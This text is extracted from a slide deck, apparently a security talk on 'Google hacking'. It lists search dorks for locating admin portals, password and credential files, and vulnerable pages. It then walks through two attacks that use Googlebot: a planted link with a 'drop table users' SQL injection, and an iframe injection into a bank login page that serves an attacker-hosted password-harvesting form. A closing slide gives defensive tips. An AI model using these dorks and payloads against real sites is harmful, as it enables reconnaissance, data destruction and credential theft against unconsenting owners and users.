  • 6. Dirty Attacks With Google hacking Google Hacking Database (GHDB)! We call them “googledorks”  :  Inept or foolish people as revealed by Google.   What is Google Hacking? What a Hacker Can do   Advisories and Vulnerabilities with vulnerable Web?   Error Messages that contain too much information Google Hacking Database (GHDB)   Files containing usernames and passwords --------------------------------   Footholds and juicy Info Google Hacking   Pages containing login portals basics Google Advanced   Pages containing network or vulnerability data Operators   Sensitive Directories --------------------------------   Sensitive Online Shopping Info Locating Exploits and Finding Targets   Vulnerable Files and Servers Tracking Down Web   Web Server Detection Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 7. Dirty Attacks With Google hacking Google Hacking Database (GHDB)! h;p://johnny.ihackstuff.com/ghdb.php.   What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 8. Dirty Attacks With Google hacking Google Hacking Database (GHDB)! Pages  containing  login  portals     What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 9. Dirty Attacks With Google hacking Google Hacking Database (GHDB)! in-tle:"ColdFusion  Administrator  Login"   What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 10. Dirty Attacks With Google hacking Google Hacking Database (GHDB)! “ColdFusion  Administrator  Login"   What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 11. Dirty Attacks With Google hacking Google Hacking basics! Crawl  Website  Informa-on  with  Caches       What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 12. Dirty Attacks With Google hacking Google Hacking basics! Using  Google  as  a  Proxy  Server       What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 13. Dirty Attacks With Google hacking Google Hacking basics! Basic  Search  Operators   What is Google Hacking? What a Hacker Can do with vulnerable Web?   Use the plus sign (+) to force a search for an overly Google Hacking Database (GHDB) common word --------------------------------   Use the minus sign (-) to exclude a term from a Google Hacking search basics   (|) / OR, admin | administrator Google Advanced   To search for a phrase, supply the phrase Operators surrounded by double quotes (" ") -------------------------------- Locating Exploits and   A period (.) serves as a single-character wildcard. Finding Targets   An asterisk (*) represents any word - not the Tracking Down Web completion of a word, as is traditionally used Servers, Login Portals, etc..   Mixed searches, Can involve both phrases and Dirty Attacks using individual terms Googlebot Google Hacking Tools --------------------------------
  • 14. Dirty Attacks With Google hacking Google Advanced Operators! Advanced  Search  Operators   What is Google Hacking? What a Hacker Can do with vulnerable Web?   filetype: Google Hacking Database (GHDB)   info: --------------------------------   define: Google Hacking basics   intext: Google   inurl: Advanced   intitle: Operators   inanchor: -------------------------------- Locating Exploits and   link: Finding Targets   site: Tracking Down Web Servers, Login   stocks: Portals, etc..   cache: Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 15. Dirty Attacks With Google hacking Google Advanced Operators! Website  Informa-on  Gathering  –  “site:www.amazon.com”  ! What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 16. Dirty Attacks With Google hacking Google Advanced Operators! Subdomains  Gathering  –  “site:amazon.com     What is Google –site:www.amazon.com”  ! Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 17. Dirty Attacks With Google hacking Google Advanced Operators! Website  containing  Error  Message  –  “Error  |  Warning  site:…”  ! What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 18. Dirty Attacks With Google hacking Google Advanced Operators! Directory  Lis-ng  –  in-tle:index.of  admin  ! What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 19. Dirty Attacks With Google hacking Google Advanced Operators! Directory  Lis-ng  –  in-tle:index.of  WS_FTP.LOG  ! What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 20. Dirty Attacks With Google hacking Google Advanced Operators! Web  server  Informa-on  –  in-tle:index.of  “Server  at”  ! What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 21. Dirty Attacks With Google hacking Google Advanced Operators! Administra-ve  Login  Portals  –  “admin  login”    ! What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 22. Dirty Attacks With Google hacking Google Advanced Operators! File  robots.txt  –  “inurl:robots.txt”    ! What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 23. Dirty Attacks With Google hacking Google Advanced Operators! Vulnerable  File  (Robpoll.cgi)  –  “inurl:robpoll.cgi filetype:cgi” ! What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 24. Dirty Attacks With Google hacking Google Advanced Operators! File  containing  password  –  “AutoCreate=TRUE  password=*”! What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 25. Dirty Attacks With Google hacking Google Advanced Operators! What is Google MS  Access  DB  password  –  “inurl:admin  mdb”! Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 26. Dirty Attacks With Google hacking Google Advanced Operators! What is Google MS  Access  DB  password  –  “inurl:admin  mdb”! Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 27. Dirty Attacks With Google hacking Google Advanced Operators! What is Google Password  File  –  “index  of  /etc"  passwd! Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 28. Dirty Attacks With Google hacking Google Advanced Operators! What is Google Crack  /  Keygen…  –  94FBR  sobware! Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 29. Dirty Attacks With Google hacking Locating Exploits and Finding Targets! Loca-ng  Exploits  Via  Common  Code  Strings   What is Google Hacking? What a Hacker Can do with vulnerable Web?   Another way to locate exploit code is to focus on Google Hacking Database (GHDB) common strings within the source code itself --------------------------------   One way to do this is to focus on common inclusions Google Hacking or header file references basics   For Example, many C programs include the standard Google Advanced Operators input/output library functions, which are references by -------------------------------- an include statement such as #include <stdio.h> within the source code Locating Exploits and Finding   A query like this would locate C source code that Targets contained the word exploit, regardless of the file’s Tracking Down Web extension: Servers, Login Portals, etc..       Dirty Attacks using Googlebot “#include  <stdio.h>”  exploit   Google Hacking Tools --------------------------------
  • 30. Dirty Attacks With Google hacking Locating Exploits and Finding Targets! Loca-ng  Exploits  Via  Common  Code  Strings   What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 31. Dirty Attacks With Google hacking Locating Exploits and Finding Targets! Loca-ng  Exploits  Via  Common  Code  Strings   What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 32. Dirty Attacks With Google hacking Locating Exploits and Finding Targets! Loca-ng  Targets  Via  Demonstra-on  Pages   What is Google Hacking? What a Hacker Can do with vulnerable Web?   Develop a query string to locate vulnerable targets on Google Hacking Database (GHDB) the Web; the vendor’s Website is a good place to -------------------------------- discover what exactly the product’s Web pages look Google Hacking like basics   For Example, some administrators might modify the Google Advanced format of a vendor-supplied Web page to fit the Operators theme of the site --------------------------------   These types of modifications can impact the Locating Exploits effectiveness of a Google search that targets a and Finding Targets vendor-supplied page format Tracking Down Web   You can find that most sites look very similar and that Servers, Login nearly every site has a “Powered by” message at the Portals, etc.. bottom of the main page Dirty Attacks using Googlebot           Google Hacking Tools --------------------------------
  • 33. Dirty Attacks With Google hacking Locating Exploits and Finding Targets! Loca-ng  Targets  Via  Source  Code   What is Google Hacking? What a Hacker Can do with vulnerable Web?   A hacker might use the source code of a program to Google Hacking Database (GHDB) discover ways to search for that software with Google --------------------------------   To find the best search string to locate potentially Google Hacking vulnerable targets, you can visit the Web page of the basics software vendor to find the source code of the Google Advanced offending software Operators --------------------------------   In case where source code is not available, an attacker might opt to simply download the offending Locating Exploits software and run it on a machine he controls to get and Finding Targets ideas for potential searches Tracking Down Web           Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 34. Dirty Attacks With Google hacking Locating Exploits and Finding Targets! Vulnerable  Web  Applica-on  Examples! What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 35. Dirty Attacks With Google hacking Locating Exploits and Finding Targets! Vulnerable  Web  Applica-on  Examples! What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 36. Dirty Attacks With Google hacking Locating Exploits and Finding Targets! Finding  targets  via  “powered  by”  –  “Powered  By  cubecart”   What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 37. Tracking Down Web Servers, Log Dirty Attacks With Google hacking Portals, etc..! Query  for  “Microsob-­‐IIS/5.0  Server  at” ! What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 38. Tracking Down Web Servers, Log Dirty Attacks With Google hacking Portals, etc..! IIS  HTTP/1.1  Error  Page  Titles! What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 39. Tracking Down Web Servers, Log Dirty Attacks With Google hacking Portals, etc..! Query  for  IIS    5.0  –  intext:“404  Object  Not  Found”  Microsob   What is Google Hacking? IIS/5.0! What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 40. Tracking Down Web Servers, Log Dirty Attacks With Google hacking Portals, etc..! Query  for  “Apache”  “Server  at”  –in-tle:index.of  in-tle:error  ! What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 41. Tracking Down Web Servers, Log Dirty Attacks With Google hacking Portals, etc..! Apache  2.0  Error  Pages! What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 42. Tracking Down Web Servers, Log Dirty Attacks With Google hacking Portals, etc..! Default  Pages  for  Web  Servers! What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 43. Tracking Down Web Servers, Log Dirty Attacks With Google hacking Portals, etc..! Outlook  Web  Access  Default  Portal  –  inurl:“exchange/ What is Google Hacking? logon.asp”! What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 44. Tracking Down Web Servers, Log Dirty Attacks With Google hacking Portals, etc..! Windows  Registry  Entries  Can  Reveal  Passwords  –  filetype:reg   What is Google Hacking? intext:"internet  account  manager"! What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 45. Tracking Down Web Servers, Log Dirty Attacks With Google hacking Portals, etc..! Error  Message  for  File  Inclusion  –  “Warning:  Failed  opening"   ! What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 46. Tracking Down Web Servers, Log Dirty Attacks With Google hacking Portals, etc..! Error  Message  for  File  Inclusion  –  “Warning:  Failed  opening"   ! What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 47. Tracking Down Web Servers, Log Dirty Attacks With Google hacking Portals, etc..! Error  Message  for  SQL  Injec-on  –  “Microsob  OLE  DB  Provider   What is Google Hacking? for  ODBC  Drivers  error”    ! What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 48. Tracking Down Web Servers, Log Dirty Attacks With Google hacking Portals, etc..! Error  Message  for  SQL  Injec-on  –  “Microsob  OLE  DB  Provider   What is Google Hacking? for  ODBC  Drivers  error”    ! What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 49. Tracking Down Web Servers, Log Dirty Attacks With Google hacking Portals, etc..! Error  Message  for  XSS/XSRF  –  inurl:“error.asp?msg=”! What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 50. Dirty Attacks With Google hacking Dirty Attacks using Googlebot! What is Google Googlebot,  Google’s  Web  Crawler! Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced <a href=http://www.mict.go.th>MICT</a> Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 51. Dirty Attacks With Google hacking Dirty Attacks using Googlebot! Google’s  Query  Processor! What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 52. Dirty Attacks With Google hacking Dirty Attacks using Googlebot! SQL  Injec-on  via  Googlebot   What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking We search in Google one of signatures: Database (GHDB) inurl:”.asp?id=“,inurl:”?name=“,”Microsoft OLE -------------------------------- Google Hacking DB Provider for SQL Server” basics Finding the link: Google Advanced Operators http://www.hackme.com/cat.asp?ID=1 -------------------------------- Locating Exploits and Create the file test.html the code is: Finding Targets <html> Tracking Down Web Servers, Login <a href=“http://www.hackme.com/cat.asp? Portals, etc.. ID=1+drop+table+’users’—”>Click Here</a> Dirty Attacks using Googlebot </html> Google Hacking Tools --------------------------------
  • 53. Dirty Attacks With Google hacking Dirty Attacks using Googlebot! SQL  Injec-on  via  Googlebot   What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Then upload to: Database (GHDB) http://www.mysite.com/test.html -------------------------------- Google Hacking After a few days GoogleBot will index the file: basics Google Advanced http://www.mysite.com/test.html Operators Then index the link “Click Here” inside the file: -------------------------------- Locating Exploits and http://www.hackme.com/cat.asp?ID=1+drop+table Finding Targets +’users’— Tracking Down Web Servers, Login The application SQL query is: Portals, etc.. Dirty Attacks SELECT Username FROM users WHERE ID=1 using Googlebot drop table ‘users’— Google Hacking Tools -------------------------------- The Result: The table “users” has been deleted, thanks to Google
  • 54. Dirty Attacks With Google hacking Dirty Attacks using Googlebot! Google’s  Query  Processor! <a href=“http:// What is Google Hacking? www.hackeme.co m/cat.asp? What a Hacker Can do with vulnerable Web? ID=1+drop+table +’users’—”>Click Google Hacking Database (GHDB) Here</a> -------------------------------- Google Hacking basics <a href=“http:// Google Advanced www.hackeme.co Operators m/cat.asp? -------------------------------- ID=1+drop+table Locating Exploits and +’users’—”>Click Finding Targets Here</a> Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools /cat.asp?ID=1+drop -------------------------------- +table+’users’—
  • 55. Dirty Attacks With Google hacking Dirty Attacks using Googlebot! Cross  Site  Framing  via  Googlebot   What is Google Hacking? What a Hacker Can do We search in Google one of signatures: with vulnerable Web? inurl:”.asp?msg=“,inurl:”.asp?title=“,.. Google Hacking Database (GHDB) We find the link: -------------------------------- http://www.CITEC.com/bank/Login.asp?MsgError=Access Google Hacking basics denied Google Advanced Create the file 1.html the code is: Operators -------------------------------- <html> Locating Exploits and <title>CITEC Bank | Login CITEC | CITEC Account</ Finding Targets title> Tracking Down Web Servers, Login <a href=“http://www.CITEC.com/bank/Login.asp? Portals, etc.. MsgError=<iframe src=‘http://www.social.com/ Dirty Attacks using Googlebot 2.html’></iframe>”>CITEC Bank</a> Google Hacking Tools </html> --------------------------------
  • 56. Dirty Attacks With Google hacking Dirty Attacks using Googlebot! Cross  Site  Framing  via  Googlebot   What is Google Hacking? What a Hacker Can do with vulnerable Web? And the file 2.html Google Hacking <form method=“post” action=“http:// Database (GHDB) www.social.com/1.php> -------------------------------- Google Hacking Username: <input type=“text” name=“user”><br> basics Password: <input type=“password” name=“pass”> Google Advanced Operators <input type=“submit” value=“Send”> -------------------------------- </form> Locating Exploits and Finding Targets Tracking Down Web Servers, Login Then upload All The Files to: Portals, etc.. http://www.social.com/ Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 57. Dirty Attacks With Google hacking Dirty Attacks using Googlebot! Cross  Site  Framing  via  Googlebot   What is Google Hacking? What a Hacker Can do with vulnerable Web? After a few days GoogleBot will index the file: Google Hacking Database (GHDB) http://www.social.com/1.html -------------------------------- Google Hacking basics Then will index the link “CITEC Bank”(that Google Advanced within the file): Operators http://www.CITEC.com/bank/Login.asp? -------------------------------- Locating Exploits and MsgError=<iframe src=‘http://www.social.com/2.html’></ Finding Targets iframe> Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 58. Dirty Attacks With Google hacking Dirty Attacks using Googlebot! Cross  Site  Framing  via  Googlebot   What is Google Hacking? What a Hacker Can do with vulnerable Web? The users that search “CITEC Bank” will find Google Hacking the above link and when getting inside the link Database (GHDB) -------------------------------- they will see this form: Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools The Result: Many Users are being Manipulated by the -------------------------------- attacker which uses Google in order to execute a Phishing attack (with XSS).
  • 59. Dirty Attacks With Google hacking Google Hacking Tools! What is Google Google  Hacking  Database  (GHDB)! Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 60. Dirty Attacks With Google hacking Google Hacking Tools! What is Google Gooscan! Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 61. Dirty Attacks With Google hacking Google Hacking Tools! What is Google SiteDigger  Tools! Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 62. Dirty Attacks With Google hacking Google Hacking Tools! Goolink  –  This  is  very  handy  for  finding  vulnerable  site  wide  open  to   What is Google Hacking? google  and  googlebots! What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 63. Dirty Attacks With Google hacking Google Hacking Tools! What is Google GoolagScanner  –  Enable  to  Audit  Website  via  Google! Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 64. Dirty Attacks With Google hacking Spike Bot – (By Me )! What is Google Hacking? Google  Links  with  Spike  Bot ! What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 65. Dirty Attacks With Google hacking How to Protect Google Hacking! What is Google   Keep sensitive data off the web Hacking?   Use common sense!! Basic security practices is all it What a Hacker Can do with vulnerable Web? takes. Defense in depth, act diligently when Google Hacking configuring web based devices and have a strong Database (GHDB) corporate security policy --------------------------------   Use Google hacking techniques to uncover your own Google Hacking basics security problems. So…..Google hack yourself! Google Advanced   Perform periodic Google Assessments Operators –  Update robots.txt -------------------------------- Locating Exploits and –  Use meta-tags: NOARCHIVE Finding Targets –  http://www.google.com/remove.html Tracking Down Web Servers, Login   Work with Google for help in removing security Portals, etc.. breaches. They are easy to work with and want to Dirty Attacks using help! You can find contact info on their site Googlebot Google Hacking Tools --------------------------------
  • 66. Dirty Attacks With Google hacking If someone is still in the room.. Q & A! What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking THANK YOU basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------